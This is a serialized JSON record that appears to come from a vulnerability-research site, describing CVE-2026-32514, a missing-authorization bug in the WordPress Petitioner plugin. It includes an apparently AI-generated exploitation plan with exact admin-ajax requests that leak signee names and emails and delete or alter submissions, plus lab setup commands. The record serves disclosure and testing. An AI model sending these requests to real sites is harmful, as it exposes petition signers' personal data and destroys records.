[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fE9iu7JVDCfpa99DfuTBxUZyn5_zCb_qOa3jrJzgSyCc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32514","petitioner-missing-authorization","Petitioner \u003C= 0.7.3 - Missing Authorization","The Petitioner plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 0.7.3. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","petitioner",null,"\u003C=0.7.3","0.7.4","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-27 00:00:00","2026-03-27 18:39:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffc707604-b2ce-4925-b3aa-eeb850543ca1?source=api-prod",1,[22,23,24,25,26,27,28,29],"dist\u002Fadmin-legacy.js","dist\u002Fadmin.js","inc\u002Fclass-setup.php","inc\u002Fsubmissions\u002Fclass-submissions-controller.php","package.json","petitioner.php","readme.txt","src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx","researched",false,3,"This research plan outlines the technical steps required to exploit a Missing Authorization vulnerability in the Petitioner plugin (versions up to 0.7.3).\n\n### 1. Vulnerability Summary\nThe Petitioner plugin registers several AJAX actions for managing petition submissions (fetching, updating, deleting, and status changes) using the `wp_ajax_` prefix in `inc\u002Fclass-setup.php`. While these actions are restricted to authenticated users, the corresponding handler functions in `AV_Petitioner_Submissions_Controller` (in `inc\u002Fsubmissions\u002Fclass-submissions-controller.php`) fail to perform capability checks (e.g., `current_user_can('manage_options')`). \n\nAdditionally, frontend source code (e.g., `src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx`) reveals that these endpoints do not implement WordPress nonces for CSRF protection, allowing any logged-in user (starting from the Subscriber role) to manipulate or delete petition signatures.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoints:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Actions:** \n    *   `petitioner_delete_submission` (Primary Target)\n    *   `petitioner_fetch_submissions` (PII Leakage)\n    *   `petitioner_change_status`\n    *   `petitioner_update_submission`\n*   **Method:** `POST`\n*   **Authentication:** Required (Subscriber-level access).\n*   **Parameters:** \n    *   `id`: The integer ID of the submission to delete\u002Fupdate.\n    *   `form_id`: Used in `petitioner_fetch_submissions` to list entries.\n\n### 3. Code Flow\n1.  **Registration:** In `inc\u002Fclass-setup.php`, the plugin hooks AJAX actions:\n    `add_action('wp_ajax_petitioner_delete_submission', ['AV_Petitioner_Submissions_Controller', 'api_delete_form_submission']);`\n2.  **Request Entry:** An authenticated user sends a POST request to `admin-ajax.php?action=petitioner_delete_submission`.\n3.  **Missing Check:** The `AV_Petitioner_Submissions_Controller::api_delete_form_submission` method is invoked. It lacks a `current_user_can()` check or a `check_ajax_referer()` call.\n4.  **Sink:** The controller calls `AV_Petitioner_Submissions_Model::delete_submission($id)`, which executes a database deletion.\n\n### 4. Nonce Acquisition Strategy\nBased on the provided source file `src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx`, the admin-facing AJAX handlers **do not require nonces**. The `fetch` calls in the React components pass only the submission `id` and `action` without any `nonce` or `security` parameter.\n\n```javascript\n\u002F\u002F Verification from ResendButton.tsx\nconst response = await fetch(`${ajaxurl}?action=petitioner_resend_confirmation_email`, {\n    method: 'POST',\n    body: new URLSearchParams({ id: id.toString() }), \u002F\u002F No nonce present\n});\n```\nTherefore, a Subscriber-level attacker can trigger these actions directly as long as they provide a valid `id`.\n\n### 5. 
Exploitation Strategy\n\n#### Step 1: Discover a Submission ID\nTo delete a submission, the attacker needs a valid submission `id`. They can leak all submissions (and their IDs) for a specific form using the vulnerable `petitioner_fetch_submissions` action.\n\n*   **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=petitioner_fetch_submissions&form_id=1\n    ```\n*   **Response:** A JSON object containing an array of signees, including their `id`, `email`, and `fname`.\n\n#### Step 2: Delete a Submission\nOnce an `id` is obtained (e.g., `id=42`), the attacker performs the unauthorized deletion.\n\n*   **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=petitioner_delete_submission&id=42\n    ```\n*   **Expected Response:** `{\"success\": true}`\n\n### 6. Test Data Setup\n1.  **Create Petition:** Create a new petition post via WP-CLI.\n    ```bash\n    wp post create --post_type=petitioner-petition --post_title=\"Save the Whales\" --post_status=publish\n    ```\n2.  **Generate Submission:** Use the public form submission action to create a test signature. (Requires a nonce, but we can bypass the public check by using WP-CLI to insert directly or by fetching the nonce from a page with the petition shortcode).\n    ```bash\n    # Alternative: Use WP-CLI to insert a row into the custom table directly\n    wp db query \"INSERT INTO wp_petitioner_submissions (form_id, email, fname, lname, approval_status) VALUES (1, 'victim@example.com', 'John', 'Doe', 'Confirmed')\"\n    ```\n3.  **Create Attacker:** Create a user with the Subscriber role.\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n\n### 7. 
Expected Results\n*   The `petitioner_fetch_submissions` request should return PII data (emails\u002Fnames) for all signees, even though the user is only a Subscriber.\n*   The `petitioner_delete_submission` request should return a success message.\n*   The targeted signature should be removed from the database.\n\n### 8. Verification Steps\nAfter running the exploit as a Subscriber, verify the deletion using WP-CLI:\n```bash\n# Check if the submission still exists in the database\nwp db query \"SELECT * FROM wp_petitioner_submissions WHERE email='victim@example.com'\"\n# Expected: Empty result\n```\n\n### 9. Alternative Approaches\nIf `petitioner_delete_submission` is not prioritized, target `petitioner_update_submission` to alter the names or emails of signees:\n*   **Payload:** `action=petitioner_update_submission&id=42&petitioner_email=hacked@evil.com&petitioner_fname=Hacked`\n*   **Reasoning:** Demonstrates unauthorized modification (Integrity violation).","The Petitioner plugin for WordPress (\u003C= 0.7.3) is vulnerable to unauthorized access and data manipulation due to missing authorization and nonce checks in several administrative AJAX handlers. 
This allows authenticated attackers, such as Subscribers, to fetch signee PII, update submission details, or delete petition signatures without administrative privileges.","\u002F\u002F inc\u002Fclass-setup.php lines 77-84\nadd_action('wp_ajax_petitioner_fetch_submissions', array('AV_Petitioner_Submissions_Controller', 'api_fetch_form_submissions'));\nadd_action('wp_ajax_petitioner_get_submissions', array('AV_Petitioner_Submissions_Controller', 'api_get_form_submissions'));\nadd_action('wp_ajax_nopriv_petitioner_get_submissions', array('AV_Petitioner_Submissions_Controller', 'api_get_form_submissions'));\nadd_action('wp_ajax_petitioner_change_status', array('AV_Petitioner_Submissions_Controller', 'api_change_submission_status'));\nadd_action('wp_ajax_petitioner_resend_confirmation_email', ['AV_Petitioner_Submissions_Controller', 'api_resend_confirmation_email']);\nadd_action('wp_ajax_petitioner_resend_all_confirmation_emails', ['AV_Petitioner_Submissions_Controller', 'api_resend_all_confirmation_emails']);\nadd_action('wp_ajax_petitioner_check_unconfirmed_count', ['AV_Petitioner_Submissions_Controller', 'api_check_unconfirmed_count']);\nadd_action('wp_ajax_petitioner_update_submission', ['AV_Petitioner_Submissions_Controller', 'api_update_form_submission']);\nadd_action('wp_ajax_petitioner_delete_submission', ['AV_Petitioner_Submissions_Controller', 'api_delete_form_submission']);\n\n---\n\n\u002F\u002F src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx lines 20-30\nconst response = await fetch(\n    `${ajaxurl}?action=petitioner_resend_confirmation_email`,\n    {\n        method: 'POST',\n        headers: {\n            'Content-Type':\n                'application\u002Fx-www-form-urlencoded; charset=UTF-8',\n        },\n        body: new URLSearchParams({\n            id: id.toString(),\n        }),\n    }\n);","diff -ru 
\u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.3\u002Fdist\u002Fadmin.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.4\u002Fdist\u002Fadmin.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.3\u002Fdist\u002Fadmin.js\t2026-01-15 01:42:20.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.4\u002Fdist\u002Fadmin.js\t2026-02-16 17:39:04.000000000 +0000\n@@ -1,4 +1,4 @@\n-var ov=Object.freeze,Mk=Object.defineProperty;var fe=(e,t)=>ov(Mk(e,\"raw\",{value:ov(t||e.slice())}));import{s as Fk}from\".\u002Fassets\u002Futilities-Cs0l2Oez.js\";function F8(){import.meta.url,import(\"_\").catch(()=>1),async function*(){}().next()}function $k(e,t){for(var n=0;n\u003Ct.length;n++){const r=t[n];if(typeof r!=\"string\"&&!Array.isArray(r)){for(const o in r)if(o!==\"default\"&&!(o in e)){const i=Object.getOwnPropertyDescriptor(r,o);i&&Object.defineProperty(e,o,i.get?i:{enumerable:!0,get:()=>r[o]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:\"Module\"}))}var zk=typeof globalThis\u003C\"u\"?globalThis:typeof window\u003C\"u\"?window:typeof global\u003C\"u\"?global:typeof self\u003C\"u\"?self:{};function ml(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,\"default\")?e.default:e}var Yb={exports:{}},$c={},Xb={exports:{}},be={};\u002F**\n+var ov=Object.freeze,Mk=Object.defineProperty;var fe=(e,t)=>ov(Mk(e,\"raw\",{value:ov(t||e.slice())}));import{s as Fk}from\".\u002Fassets\u002Futilities-Cs0l2Oez.js\";function F8(){import.meta.url,import(\"_\").catch(()=>1),async function*(){}().next()}function $k(e,t){for(var n=0;n\u003Ct.length;n++){const r=t[n];if(typeof r!=\"string\"&&!Array.isArray(r)){for(const o in r)if(o!==\"default\"&&!(o in e)){const 
i=Object.getOwnPropertyDescriptor(r,o);i&&Object.defineProperty(e,o,i.get?i:{enumerable:!0,get:()=>r[o]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:\"Module\"}))}var zk=typeof globalThis\u003C\"u\"?globalThis:typeof window\u003C\"u\"?window:typeof global\u003C\"u\"?global:typeof self\u003C\"u\"?self:{};function hl(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,\"default\")?e.default:e}var Yb={exports:{}},zc={},Xb={exports:{}},be={};\u002F**\n... (truncated)","The exploit targets the administrative AJAX handlers that lack capability checks. An attacker must first authenticate as any user (e.g., Subscriber). 1. Data Leakage: The attacker sends a POST request to admin-ajax.php with the action 'petitioner_fetch_submissions' and a 'form_id'. The server responds with signee PII and submission IDs. 2. Data Modification\u002FDeletion: Using a leaked submission ID, the attacker sends a POST request to 'petitioner_delete_submission' or 'petitioner_update_submission' with the 'id' parameter. Because the controller fails to verify if the user has 'manage_options' capabilities or validate a nonce, the action is executed on the database.","gemini-3-flash-preview","2026-04-17 22:40:11","2026-04-17 22:40:45",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","0.7.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpetitioner\u002Ftags\u002F0.7.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpetitioner.0.7.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpetitioner\u002Ftags\u002F0.7.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpetitioner.0.7.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpetitioner\u002Ftags"]